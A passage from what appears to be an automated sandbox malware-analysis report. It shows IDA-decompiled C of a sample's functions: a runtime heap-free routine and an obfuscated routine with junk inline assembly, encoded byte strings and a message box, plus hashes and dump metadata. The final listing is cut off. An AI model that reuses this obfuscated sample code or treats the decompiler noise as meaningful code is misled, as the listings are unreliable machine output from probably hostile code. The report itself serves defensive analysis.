                                              • Instruction Fuzzy Hash: 8D014832A01629ABD731AF249605F9C73A0BF40714F28600DF81877184CB769D83DBD2
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00ECBECE Relevance: 7.5, APIs: 5, Instructions: 44memoryCOMMONLIBRARYCODE
                                              Download Yara Rule
                                              C-Code - Quality: 41%
                                              			E00ECBECE(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t10;
				intOrPtr _t13;
				intOrPtr _t23;
				void* _t25;

				_push(0xc);
				_push(0xfff578);
				_t8 = E00ECA454(__ebx, __edi, __esi);
				_t23 =  *((intOrPtr*)(_t25 + 8));
				if(_t23 == 0) {
					L9:
					return E00ECA499(_t8);
				}
				if( *0x1215448 != 3) {
					_push(_t23);
					L7:
					_t8 = HeapFree( *0x10012b4, 0, ??);
					_t31 = _t8;
					if(_t8 == 0) {
						_t10 = E00EC9069(_t31);
						 *_t10 = E00EC9027(GetLastError());
					}
					goto L9;
				}
				E00ECA9AB(__ebx, 4);
				 *(_t25 - 4) =  *(_t25 - 4) & 0x00000000;
				_t13 = E00ECAA9A(_t23);
				 *((intOrPtr*)(_t25 - 0x1c)) = _t13;
				if(_t13 != 0) {
					_push(_t23);
					_push(_t13);
					E00ECAACA();
				}
				 *(_t25 - 4) = 0xfffffffe;
				_t8 = E00ECBF24();
				if( *((intOrPtr*)(_t25 - 0x1c)) != 0) {
					goto L9;
				} else {
					_push( *((intOrPtr*)(_t25 + 8)));
					goto L7;
				}
			}







                                              0x00ecbece
                                              0x00ecbed0
                                              0x00ecbed5
                                              0x00ecbeda
                                              0x00ecbedf
                                              0x00ecbf56
                                              0x00ecbf5b
                                              0x00ecbf5b
                                              0x00ecbee8
                                              0x00ecbf2d
                                              0x00ecbf2e
                                              0x00ecbf36
                                              0x00ecbf3c
                                              0x00ecbf3e
                                              0x00ecbf40
                                              0x00ecbf53
                                              0x00ecbf55
                                              0x00000000
                                              0x00ecbf3e
                                              0x00ecbeec
                                              0x00ecbef2
                                              0x00ecbef7
                                              0x00ecbefd
                                              0x00ecbf02
                                              0x00ecbf04
                                              0x00ecbf05
                                              0x00ecbf06
                                              0x00ecbf0c
                                              0x00ecbf0d
                                              0x00ecbf14
                                              0x00ecbf1d
                                              0x00000000
                                              0x00ecbf1f
                                              0x00ecbf1f
                                              0x00000000
                                              0x00ecbf1f

                                              APIs
                                              • __lock.LIBCMT ref: 00ECBEEC
                                                • Part of subcall function 00ECA9AB: __mtinitlocknum.LIBCMT ref: 00ECA9C1
                                                • Part of subcall function 00ECA9AB: __amsg_exit.LIBCMT ref: 00ECA9CD
                                                • Part of subcall function 00ECA9AB: EnterCriticalSection.KERNEL32(?,?,?,00EC90FD,00000004,00FFF408,0000000C,00EC8E51,?,?,00000000,00000000,?,?,00EC5CD2,00000064), ref: 00ECA9D5
                                              • ___sbh_find_block.LIBCMT ref: 00ECBEF7
                                              • ___sbh_free_block.LIBCMT ref: 00ECBF06
                                              • HeapFree.KERNEL32(00000000,?,00FFF578,0000000C,00ECA13F,00000000,?,00ECBFDC,?,00000001,?,?,00ECA935,00000018,00FFF4B8,0000000C), ref: 00ECBF36
                                              • GetLastError.KERNEL32(?,00ECBFDC,?,00000001,?,?,00ECA935,00000018,00FFF4B8,0000000C,00ECA9C6,?,?,?,00EC90FD,00000004), ref: 00ECBF47
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.423883840.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                              • Associated: 00000000.00000002.423879545.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.424170838.0000000000FFE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.424177261.0000000001000000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.424207782.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_ec0000_5GPueTFF2S.jbxd
                                              Similarity
                                              • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                              • String ID:
                                              • API String ID: 2714421763-0
                                              • Opcode ID: 8b7bf2fca0dfa7d92b27ca0ae89cbc2ce55be0c01e5f517ca44ea797c635d769
                                              • Instruction ID: 8e8bcef91880f24e39c851396cceda961ead27fd0747cc8b5336cca3025dded3
                                              • Opcode Fuzzy Hash: 8b7bf2fca0dfa7d92b27ca0ae89cbc2ce55be0c01e5f517ca44ea797c635d769
                                              • Instruction Fuzzy Hash: 79018471A04249AADB306F70AE0BF6E3AE4AF00728F14201DF424B6191CB768846DA56
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00EC67D1 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 394COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 85%
                                              			E00EC67D1(void* __ecx, signed int __edx, void* __edi, void* __eflags) {
				intOrPtr _t169;
				signed int _t170;
				void* _t178;
				signed int _t190;
				intOrPtr _t191;
				signed int _t193;
				intOrPtr _t196;
				signed short _t199;
				signed int _t203;
				signed int _t209;
				intOrPtr _t210;
				signed int _t211;
				signed int _t213;
				signed int _t216;
				signed short _t217;
				void* _t219;
				void* _t222;
				void* _t228;
				WCHAR* _t231;
				signed char _t237;
				signed short _t245;
				signed short _t261;
				signed int _t271;
				signed int _t280;
				intOrPtr _t284;
				intOrPtr _t286;
				signed int _t299;
				signed int _t303;
				signed int _t312;
				signed int _t314;
				signed int _t316;
				signed int _t331;
				signed int _t333;
				signed int _t335;
				signed int _t340;
				signed short _t341;
				signed int _t352;
				intOrPtr _t357;
				signed int _t358;
				signed int _t359;
				signed short _t362;
				short _t370;
				signed int _t374;
				intOrPtr _t376;
				signed int _t379;
				signed int _t385;
				signed int _t396;
				WCHAR* _t397;
				signed int _t405;
				signed int _t406;
				signed int _t416;
				signed int _t427;
				signed int _t436;
				signed int _t440;
				signed int _t443;
				signed int _t444;
				signed int _t445;
				void* _t448;
				void* _t466;

				 *(__edi - 0x34) =  *(__edi - 0x34) << 0xc5;
				asm("fsubr qword [esi+ecx*4+0x48]");
				asm("sbb [edi], dh");
				asm("in al, dx");
				asm("ror byte [eax+eax], 0x1");
				 *0x1000cc4 = __edx;
				_t352 =  *((intOrPtr*)(_t448 - 0x20)) + 0x117;
				 *(_t448 - 0xb8) = _t352;
				 *0x1000ca4 = E00EC1700();
				asm("cdq");
				asm("adc edx, 0xcae43");
				if(( !( *0x1000c9f) + 0x0dc8da25 | _t352) != 0) {
				}
				if( *(_t448 - 0xa8) != 0x3b0) {
					 *(_t448 - 0x6c) =  *(_t448 - 0x6c) &  *0x1109ef0;
					 *(_t448 - 0x88) =  *(_t448 - 0x88) -  *(_t448 - 0x78) &  *(_t448 - 0x88);
					 *((char*)(_t448 - 0xfc)) = 0x97;
					 *((char*)(_t448 - 0xfb)) = 0xaf;
					 *((char*)(_t448 - 0xfa)) = 0xb7;
					 *((char*)(_t448 - 0xf9)) = 0xb9;
					 *((char*)(_t448 - 0xf8)) = 0xbc;
					 *((char*)(_t448 - 0xf7)) = 0xc3;
					 *((char*)(_t448 - 0xf6)) = 0x6a;
					 *((char*)(_t448 - 0xf5)) = 0xb0;
					 *((char*)(_t448 - 0xf4)) = 0xab;
					 *((char*)(_t448 - 0xf3)) = 0xbf;
					 *((char*)(_t448 - 0xf2)) = 0xb6;
					 *((char*)(_t448 - 0xf1)) = 0xbe;
					_t443 = 0;
					do {
						_t280 =  *0x1000cc0; // 0xffff970a
						if((_t280 |  *0x1000cc4) == 0) {
							_t357 =  *((intOrPtr*)(_t448 - 7));
							_t169 = _t357;
							asm("cdq");
							__eflags =  *0x1000cbc - _t357;
							if(__eflags < 0) {
								L14:
								_t170 = 0;
								__eflags = 0;
							} else {
								if(__eflags > 0) {
									L13:
									_t170 = 1;
								} else {
									__eflags =  *0x1000cb8 - _t169;
									if( *0x1000cb8 <= _t169) {
										goto L14;
									} else {
										goto L13;
									}
								}
							}
							__eflags =  !_t170;
							if( !_t170 == 0) {
								__eflags =  *0x1000ce0 |  *0x1000ce4;
								if(( *0x1000ce0 |  *0x1000ce4) != 0) {
									_t427 =  *(_t448 - 0x70) &  *0x1000ce0;
									 *0x1000ce0 = E00ECEE50(_t427, 0 &  *0x1000ce4,  *0x1000ce0,  *0x1000ce4);
									 *0x1000ce4 = _t427;
									 *0x1000cd8 =  *(_t448 - 0x40) * 0xffffe4ed;
									_t271 =  *0x1000d20 & 0xffffb755;
									__eflags = _t271;
									 *(_t448 - 0x5c) = _t271;
								}
							} else {
								 *0x1000c84 =  *0x1000c84 + 1;
							}
						} else {
							 *0x1000c84 = 0x9b;
							 *((char*)(_t448 - 8)) = 1;
						}
						_t358 =  *0x1000d08;
						_t284 =  *0x1000cf4; // 0x2b91c
						asm("cdq");
						_t359 =  *0x1000cf0; // 0xd43579fe
						 *(_t448 - 0xa8) = _t358;
						_t178 = E00ECEE50(_t359, _t284, 0x1faed387, 0);
						asm("sbb edx, edi");
						 *0x1000cf4 = 0;
						 *0x1000cf0 = 1;
						if((_t178 -  !( *(_t448 - 2) ^ _t358) | _t359) != 0) {
							 *0x1000cf0 = 0;
						}
						_t286 =  *0x1000ca4; // 0x9b27
						 *0x1000c90 = 0xb8f675f1 - ( *(_t448 - 1) & 0x000000ff);
						_t362 =  *0x1000cdc; // 0x84521e70
						_t443 = _t443 + 1;
						 *0x1000d10 = ( *(_t448 - 1) & 0x000000ff) *  *(_t448 - 0x6c) * ( *0x1000d08 - (0 | ( *(_t448 - 0x24) & 0x0000ffff) == 0x00000000)) * ((( *0x1000c83 & 0x000000ff) + 1) *  *0x1000cb4 +  !(_t286 + _t362));
						 *(_t448 + _t443 * 2 - 0x1ae) = ( *(_t448 + _t443 - 0xfd) & 0x000000ff) - 0x0000004a & 0x000000ff;
						 *0x1000d14 = 0;
					} while (_t443 < 0xc);
					_t370 = 0x92 - ( *(_t448 - 0xac) ^  *(_t448 - 0xb4));
					_t190 = M01000CB0; // 0x0
					 *((short*)(_t448 - 0x194)) = _t370;
					 *0x1000cc0 = 2;
					 *0x1000cc4 = 0;
					_t191 = E00ECEE50(_t190, 0, 0xbe790e28, 0x61b36);
					 *0x1000d1c = _t370;
					 *0x1000d18 = _t191;
					_t193 =  *0x1000cc0; // 0xffff970a
					_t299 =  *0x1000cc4; // 0xffffffff
					 *0x1000c94 =  *(_t448 - 0x1c) +  *(_t448 - 1) + 1;
					_t374 = _t193 | _t299;
					if(_t374 == 0) {
						_t376 = 1 -  *(_t448 - 0x78);
						asm("sbb eax, ecx");
						_t196 = E00ECEE50(_t376, 0,  *0x1000ca8,  *0x1000cac);
						 *0x1000cac = _t376;
						_t374 =  *0x1000c83 & 0x000000ff;
						M01000CB0 = M01000CB0 ^ _t374;
						__eflags = M01000CB0;
						 *0x1000ca8 = _t196;
					} else {
						if(_t193 != 1 || _t299 != 0) {
							if(_t193 == 2 && _t299 == 0) {
								 *((intOrPtr*)(_t448 - 0xbc)) = 0;
								if( *(_t448 - 0x24) != 0) {
									_t341 = 0;
									__eflags = 0;
								} else {
									_t341 = 1;
								}
								 *((intOrPtr*)(_t448 - 0xbc)) = 0;
								if( *((intOrPtr*)(_t448 - 0xb)) != 0) {
									_t261 = 0;
									__eflags = 0;
								} else {
									_t261 = 1;
								}
								 *(_t448 - 0x18) = ( *(_t448 - 0x78) - _t341) *  *0x1000d10 * _t261;
								asm("cdq");
								asm("sbb esi, edx");
								_t374 =  *(_t448 - 0x48);
								asm("sbb esi, eax");
								 *(_t448 - 0x48) =  *(_t448 - 0x48) -  *((intOrPtr*)(_t448 - 7)) - _t374;
							}
						} else {
							 *0x1000d18 =  *0x1215420;
							 *0x1000d1c = 0;
							 *(_t448 - 2) =  *(_t448 - 2) & 0x000000ff &  *(_t448 - 0x80) & 0x0000ffff |  *(_t448 - 2) & 0x000000ff;
							_t374 =  *0x10ae26c;
							 *0x1000d20 =  *0x1000d20 | _t374;
						}
					}
					 *((char*)(_t448 - 0xdc)) = 0xe5;
					 *((char*)(_t448 - 0xdb)) = 0xdd;
					 *((char*)(_t448 - 0xda)) = 0xe5;
					 *((char*)(_t448 - 0xd9)) = 0xe7;
					 *((char*)(_t448 - 0xd8)) = 0xea;
					 *((char*)(_t448 - 0xd7)) = 0xf1;
					_t199 = E00EC1190() & 0x000000ff;
					 *0x1000cd8 = _t199;
					if(_t199 > 0) {
						asm("cdq");
						 *0x1000d1c = 0;
						asm("adc edx, [0x1000cbc]");
						 *0x1000cc0 =  !(( *0x1000c83 & 0x000000ff) +  *0x1000cb8);
						 *0x1000cc4 =  !_t374;
						 *0x1000d18 =  *0x1215420;
						 *((intOrPtr*)(_t448 - 0x58)) =  *((intOrPtr*)(_t448 - 0x58)) + 1;
						asm("adc [ebp-0x54], ebx");
					}
					_t303 =  *(_t448 - 0x40);
					 *((intOrPtr*)(_t448 - 0x38)) = _t303 + _t303 + _t303 + _t303 + _t303 + _t303 + _t303 + _t303;
					 *(_t448 - 0x34) = ( *(_t448 - 0x3c) << 0x00000020 | _t303) << 3;
					 *0x10ae368 =  *((intOrPtr*)(_t448 - 0x38));
					_t444 = 0;
					do {
						_t379 =  *((intOrPtr*)(_t448 - 0xb));
						_t466 =  *0x1000c9b - _t379; // -28
						if(_t466 >= 0) {
							if( *(_t448 - 1) == 0) {
								_t203 =  *(_t448 - 0x6c);
								_t436 =  *(_t448 - 0x34);
								asm("cdq");
								__eflags = _t203 -  *((intOrPtr*)(_t448 - 0x38));
								if(_t203 !=  *((intOrPtr*)(_t448 - 0x38))) {
									L44:
									 *(_t448 - 0x90) =  *(_t448 - 0x40) +  *0x1000d10 +  *0x1000c84 -  *(_t448 - 1);
									 *(_t448 - 0x2c) =  *(_t448 - 0x2c) - ( *(_t448 - 0x2c) &  *0x1000cf0 & 0x0000ffff);
									 *0x1000ca0 =  *0x1000ca0 +  *(_t448 - 0x7c);
									 *0x1000c9e =  *0x1215420;
									 *0x1000c88 =  *0x1000c88 -  *(_t448 - 0x40);
									asm("sbb [0x1000c8c], eax");
								} else {
									__eflags = _t379 - _t436;
									if(_t379 == _t436) {
										_t333 =  *0x1000c88 |  *0x1000c8c;
										__eflags = _t333;
										 *_t333 =  *_t333 + _t203;
										__eflags =  *_t333;
										if( *_t333 != 0) {
											_t440 =  *(_t448 - 0x74);
											_t209 =  *0x1000c83 & 0x000000ff;
											asm("cdq");
											_t335 =  *(_t448 - 0x78) - _t209;
											__eflags = _t335;
											asm("enter 0xfa1b, 0x8b");
											_push(_t448);
											 *0x3DE8FE44 = _t335;
											 *(_t448 - 0x78) = _t335;
											 *(_t448 - 0x74) = _t440 & _t209;
											 *(_t448 - 0xa) = ( *(_t448 - 0xa) & 0x000000ff) + ( *(_t448 - 0x18) & 0x0000ffff);
											_t210 =  *((intOrPtr*)(_t448 - 4));
											 *0x1000cf0 = 0x73c571ff;
											_t340 = _t210 +  *0x1000cc8 + 1;
											__eflags = _t340;
											 *0x1000cd4 = _t340;
											 *0x1000cf4 = 0;
											_t211 = _t210 + 0x1000cf4;
											__eflags = _t211;
											 *_t340 =  *_t340 + _t211;
											 *_t211 =  *_t211 + _t211;
											 *_t211 =  *_t211 + _t211;
											__eflags =  *_t211;
										}
									} else {
										goto L44;
									}
								}
							} else {
								_t331 =  *0x1000d04; // 0xffffffff
								asm("cdq");
								_t213 =  *0x1000d00; // 0xfffff835
								_t416 = _t379 & _t331;
								 *0x1000d00 = E00ECEE50( *(_t448 - 0x1c) & _t213, _t416, _t213, _t331);
								 *0x1000d04 = _t416;
							}
						}
						 *(_t448 + _t444 * 2 - 0x160) = ( *(_t448 + _t444 - 0xdc) & 0x000000ff) + 0x00000068 & 0x000000ff;
						_t444 = _t444 + 1;
					} while (_t444 < 6);
					_t312 =  *0x1000d00; // 0xfffff835
					 *0x1000ce0 = 2;
					 *0x1000ce4 = 0;
					 *(_t448 - 0x70) = _t312 * 0x6eb594ba;
					_t314 =  *0x1000ce4; // 0x0
					 *0x110030c =  *(_t448 - 0x60);
					_t216 =  *0x1000ce0; // 0x0
					_t385 = _t216 | _t314;
					if(_t385 == 0) {
						 *((intOrPtr*)(_t448 - 0xbc)) = 0;
						__eflags =  *(_t448 - 6);
						if( *(_t448 - 6) != 0) {
							_t217 = 0;
							__eflags = 0;
						} else {
							_t217 = 1;
						}
						_t316 =  *0x1000d00 + _t217;
						__eflags = _t316;
						 *(_t448 - 0x24) =  !_t316;
					} else {
						if(_t216 != 1 || _t314 != 0) {
							if(_t216 == 2 && _t314 == 0) {
								_t245 =  *0x1000cdc; // 0x84521e70
								 *(_t448 - 0x60) = ( *(_t448 - 0x68) ^ _t245 ^  *0x1000d00) * (_t245 + 0xffffbb58);
								_t405 =  *0x1000c94; // 0x0
								_t406 = _t405 * 0x2d40daef;
								 *(_t448 - 0x7c) =  *(_t448 - 0x7c) * ( *0x1000cec & 0x0000ffff);
								 *(_t448 - 0x90) = _t406;
								asm("cdq");
								 *((intOrPtr*)(_t448 - 0x38)) = ( *(_t448 - 0x84) & 0x0000ffff) + ( *(_t448 - 0x84) & 0x0000ffff) + ( *(_t448 - 0x84) & 0x0000ffff) + ( *(_t448 - 0x84) & 0x0000ffff) + ( *(_t448 - 0x84) & 0x0000ffff) + ( *(_t448 - 0x84) & 0x0000ffff) + ( *(_t448 - 0x84) & 0x0000ffff) + ( *(_t448 - 0x84) & 0x0000ffff);
								 *(_t448 - 0x34) = _t406;
							}
						} else {
							asm("cdq");
							 *0x1000cb8 =  *((intOrPtr*)(_t448 - 4)) - 0x4fef3c23;
							 *0x1000cbc = _t385;
							 *((intOrPtr*)(_t448 - 0x4c)) =  *0x1215420;
							 *0x1000cd0 =  *0x1000cd0 +  *0x1000cd0 -  *0x1000ce0;
						}
					}
					 *((short*)(_t448 - 0x154)) =  ~(( *(_t448 - 0xc4) +  *((intOrPtr*)(_t448 - 0xa4))) *  *(_t448 - 0xc4) *  *(_t448 - 0x14) ^ 0x0000701c);
					_t219 = 0x20b;
					do {
						 *((char*)(_t448 - 0xb)) =  *((char*)(_t448 - 0xb)) + 1;
						_t219 = _t219 - 1;
					} while (_t219 > 0);
					_t222 = ( *(_t448 - 0x18) & 0x0000ffff |  *0x1000c9a) +  *0x1000c9f;
					 *0x1000c84 = 0;
					if(_t222 != 0) {
						_t445 = 0;
						__eflags = 0;
					} else {
						_t145 = _t222 + 1; // 0x20b
						_t445 = _t145;
					}
					asm("cdq");
					_t396 =  *(_t448 - 0x2c);
					asm("cdq");
					asm("adc edx, [0x1000cc4]");
					_t228 = E00ECEE50(( *(_t448 - 0x18) & 0x0000ffff) + ( *(_t448 - 0xc) & 0x000000ff) + 1,  *(_t448 - 0xc), _t396 +  *0x1000cc0, _t396);
					asm("sbb edx, edi");
					 *0x1000c83 = 1;
					if((_t228 - _t445 | _t396) != 0) {
						 *0x1000c83 = 0;
					}
					if( *0x1000c84 == 0) {
						 *(_t448 - 0x24) = 0x83;
						asm("cdq");
						 *0x1000cc8 = ( *(_t448 - 0x18) & 0x0000ffff) + 0xf;
						_t237 =  *0x1000cd0; // 0x0
						 *0x1000ccc = _t396;
						 *((char*)(_t448 - 5)) =  *((intOrPtr*)(_t448 - 3)) +  *((intOrPtr*)(_t448 - 0x28)) + (_t237 & 0x000000e4) - M01000CB0 +  *0x1000cb8 - 0x2d;
						asm("cdq");
						 *((intOrPtr*)(_t448 - 0xa0)) =  *((intOrPtr*)(_t448 - 0xa0)) -  *0x1000cd0 - 0x3811;
						asm("sbb [ebp-0x9c], edx");
					}
					_t158 = _t448 - 0x160; // 0x60f1ba1c
					_t397 = _t158;
					_t159 = _t448 - 0x1ac; // 0x60f1b9d0
					_t231 = _t159;
					MessageBoxW(GetForegroundWindow(), _t231, _t397, 0x10);
				}
				return 0;
			}






























































                                              0x00ec67d3
                                              0x00ec67d7
                                              0x00ec67db
                                              0x00ec67dd
                                              0x00ec677c
                                              0x00ec6780
                                              0x00ec679f
                                              0x00ec67a5
                                              0x00ec67b1
                                              0x00ec67bf
                                              0x00ec67c5
                                              0x00ec67cd
                                              0x00ec67cd
                                              0x00ec6822
                                              0x00ec682e
                                              0x00ec6847
                                              0x00ec684d
                                              0x00ec6854
                                              0x00ec685b
                                              0x00ec6862
                                              0x00ec6869
                                              0x00ec6870
                                              0x00ec6877
                                              0x00ec687e
                                              0x00ec6885
                                              0x00ec688c
                                              0x00ec6893
                                              0x00ec689a
                                              0x00ec68a1
                                              0x00ec68b0
                                              0x00ec68b0
                                              0x00ec68bc
                                              0x00ec68d1
                                              0x00ec68da
                                              0x00ec68dd
                                              0x00ec68de
                                              0x00ec68e0
                                              0x00ec68f5
                                              0x00ec68f5
                                              0x00ec68f5
                                              0x00ec68e2
                                              0x00ec68e2
                                              0x00ec68ee
                                              0x00ec68ee
                                              0x00ec68e4
                                              0x00ec68ea
                                              0x00ec68ec
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00ec68ec
                                              0x00ec68e2
                                              0x00ec68f9
                                              0x00ec68fb
                                              0x00ec690a
                                              0x00ec6910
                                              0x00ec6928
                                              0x00ec6931
                                              0x00ec693c
                                              0x00ec694b
                                              0x00ec6956
                                              0x00ec6956
                                              0x00ec695b
                                              0x00ec695b
                                              0x00ec68fd
                                              0x00ec68fd
                                              0x00ec68fd
                                              0x00ec68be
                                              0x00ec68be
                                              0x00ec68c8
                                              0x00ec68c8
                                              0x00ec6962
                                              0x00ec696c
                                              0x00ec6976
                                              0x00ec6981
                                              0x00ec6989
                                              0x00ec698f
                                              0x00ec699c
                                              0x00ec69a2
                                              0x00ec69a8
                                              0x00ec69b2
                                              0x00ec69b4
                                              0x00ec69b4
                                              0x00ec69d7
                                              0x00ec69dd
                                              0x00ec69e3
                                              0x00ec6a02
                                              0x00ec6a20
                                              0x00ec6a35
                                              0x00ec6a3d
                                              0x00ec6a3d
                                              0x00ec6a66
                                              0x00ec6a68
                                              0x00ec6a6f
                                              0x00ec6a76
                                              0x00ec6a80
                                              0x00ec6a86
                                              0x00ec6a8f
                                              0x00ec6a95
                                              0x00ec6aa3
                                              0x00ec6aac
                                              0x00ec6ab2
                                              0x00ec6aba
                                              0x00ec6abc
                                              0x00ec6b8a
                                              0x00ec6b91
                                              0x00ec6ba3
                                              0x00ec6ba8
                                              0x00ec6bae
                                              0x00ec6bb5
                                              0x00ec6bb5
                                              0x00ec6bbb
                                              0x00ec6ac2
                                              0x00ec6ac5
                                              0x00ec6ace
                                              0x00ec6ae0
                                              0x00ec6ae9
                                              0x00ec6af2
                                              0x00ec6af2
                                              0x00ec6aeb
                                              0x00ec6aeb
                                              0x00ec6aeb
                                              0x00ec6af7
                                              0x00ec6aff
                                              0x00ec6b08
                                              0x00ec6b08
                                              0x00ec6b01
                                              0x00ec6b01
                                              0x00ec6b01
                                              0x00ec6b1f
                                              0x00ec6b2f
                                              0x00ec6b32
                                              0x00ec6b34
                                              0x00ec6b3c
                                              0x00ec6b3e
                                              0x00ec6b41
                                              0x00ec6b49
                                              0x00ec6b57
                                              0x00ec6b65
                                              0x00ec6b6b
                                              0x00ec6b6e
                                              0x00ec6b76
                                              0x00ec6b76
                                              0x00ec6ac5
                                              0x00ec6bc2
                                              0x00ec6bc8
                                              0x00ec6bcf
                                              0x00ec6bd5
                                              0x00ec6bdc
                                              0x00ec6be3
                                              0x00ec6bef
                                              0x00ec6bf6
                                              0x00ec6bfc
                                              0x00ec6c05
                                              0x00ec6c0c
                                              0x00ec6c12
                                              0x00ec6c1a
                                              0x00ec6c26
                                              0x00ec6c2c
                                              0x00ec6c31
                                              0x00ec6c35
                                              0x00ec6c35
                                              0x00ec6c38
                                              0x00ec6c48
                                              0x00ec6c4b
                                              0x00ec6c54
                                              0x00ec6c59
                                              0x00ec6c60
                                              0x00ec6c60
                                              0x00ec6c63
                                              0x00ec6c69
                                              0x00ec6c74
                                              0x00ec6ca8
                                              0x00ec6cae
                                              0x00ec6cb1
                                              0x00ec6cb2
                                              0x00ec6cb4
                                              0x00ec6cba
                                              0x00ec6cd5
                                              0x00ec6ce9
                                              0x00ec6cf7
                                              0x00ec6cfd
                                              0x00ec6d05
                                              0x00ec6d0b
                                              0x00ec6cb6
                                              0x00ec6cb6
                                              0x00ec6cb8
                                              0x00ec6d19
                                              0x00ec6d19
                                              0x00ec6d1d
                                              0x00ec6d1d
                                              0x00ec6d1f
                                              0x00ec6d24
                                              0x00ec6d27
                                              0x00ec6d2e
                                              0x00ec6d2f
                                              0x00ec6d2f
                                              0x00ec6d30
                                              0x00ec6d34
                                              0x00ec6d35
                                              0x00ec6d3b
                                              0x00ec6d40
                                              0x00ec6d4d
                                              0x00ec6d50
                                              0x00ec6d5e
                                              0x00ec6d64
                                              0x00ec6d64
                                              0x00ec6d66
                                              0x00ec6d6d
                                              0x00ec6d6e
                                              0x00ec6d6e
                                              0x00ec6d71
                                              0x00ec6d73
                                              0x00ec6d75
                                              0x00ec6d75
                                              0x00ec6d75
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00ec6cb8
                                              0x00ec6c76
                                              0x00ec6c7d
                                              0x00ec6c83
                                              0x00ec6c86
                                              0x00ec6c8d
                                              0x00ec6c98
                                              0x00ec6c9d
                                              0x00ec6c9d
                                              0x00ec6c74
                                              0x00ec6e5d
                                              0x00ec6e65
                                              0x00ec6e66
                                              0x00ec6e6f
                                              0x00ec6e7d
                                              0x00ec6e87
                                              0x00ec6e8d
                                              0x00ec6e94
                                              0x00ec6e9d
                                              0x00ec6ea2
                                              0x00ec6ea9
                                              0x00ec6eab
                                              0x00ec6f65
                                              0x00ec6f6b
                                              0x00ec6f6d
                                              0x00ec6f76
                                              0x00ec6f76
                                              0x00ec6f6f
                                              0x00ec6f6f
                                              0x00ec6f6f
                                              0x00ec6f7e
                                              0x00ec6f7e
                                              0x00ec6f82
                                              0x00ec6eb1
                                              0x00ec6eb4
                                              0x00ec6ebd
                                              0x00ec6ed4
                                              0x00ec6ef3
                                              0x00ec6efa
                                              0x00ec6f03
                                              0x00ec6f09
                                              0x00ec6f0c
                                              0x00ec6f22
                                              0x00ec6f23
                                              0x00ec6f26
                                              0x00ec6f26
                                              0x00ec6f2b
                                              0x00ec6f36
                                              0x00ec6f37
                                              0x00ec6f4a
                                              0x00ec6f56
                                              0x00ec6f59
                                              0x00ec6f59
                                              0x00ec6eb4
                                              0x00ec6fa9
                                              0x00ec6fb0
                                              0x00ec6fb5
                                              0x00ec6fb5
                                              0x00ec6fb8
                                              0x00ec6fb9
                                              0x00ec6fd4
                                              0x00ec6fd6
                                              0x00ec6fdc
                                              0x00ec6fe3
                                              0x00ec6fe3
                                              0x00ec6fde
                                              0x00ec6fde
                                              0x00ec6fde
                                              0x00ec6fde
                                              0x00ec6ff6
                                              0x00ec6ff9
                                              0x00ec7002
                                              0x00ec7009
                                              0x00ec7013
                                              0x00ec701a
                                              0x00ec701e
                                              0x00ec7025
                                              0x00ec7027
                                              0x00ec7027
                                              0x00ec7035
                                              0x00ec703c
                                              0x00ec704a
                                              0x00ec704b
                                              0x00ec7050
                                              0x00ec705d
                                              0x00ec7081
                                              0x00ec7084
                                              0x00ec7085
                                              0x00ec708b
                                              0x00ec708b
                                              0x00ec7091
                                              0x00ec7091
                                              0x00ec7097
                                              0x00ec7097
                                              0x00ec7872
                                              0x00ec7872
                                              0x00ec7880

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.423883840.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                              • Associated: 00000000.00000002.423879545.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.424170838.0000000000FFE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.424177261.0000000001000000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.424207782.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_ec0000_5GPueTFF2S.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: RPSQ8~$j
                                              • API String ID: 0-3780024997
                                              • Opcode ID: d5d259d9751721c773818f69e230da7e883f97b7816718ec6b5163928c7f3f50
                                              • Instruction ID: 51ada7c8fef09a5914840b7e198c8b1548a3525f75ca8c3cbf53d70d01c71be4
                                              • Opcode Fuzzy Hash: d5d259d9751721c773818f69e230da7e883f97b7816718ec6b5163928c7f3f50
                                              • Instruction Fuzzy Hash: 87F1F7709043598ECB29CF78D950FFEBBB2AB55310F1491AEE0C9A7349DB3A4942CB11
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00EC67EF Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 372COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 86%
                                              			E00EC67EF() {
				intOrPtr _t159;
				signed int _t160;
				void* _t168;
				signed int _t180;
				intOrPtr _t181;
				signed int _t183;
				intOrPtr _t186;
				signed short _t189;
				signed int _t193;
				signed int _t199;
				intOrPtr _t200;
				signed int _t201;
				signed int _t203;
				signed int _t206;
				signed short _t207;
				void* _t209;
				void* _t212;
				void* _t218;
				WCHAR* _t221;
				signed char _t227;
				signed short _t235;
				signed short _t251;
				signed int _t261;
				signed int _t268;
				intOrPtr _t272;
				intOrPtr _t274;
				signed int _t287;
				signed int _t291;
				signed int _t300;
				signed int _t302;
				signed int _t304;
				signed int _t319;
				signed int _t321;
				signed int _t323;
				signed int _t328;
				signed short _t329;
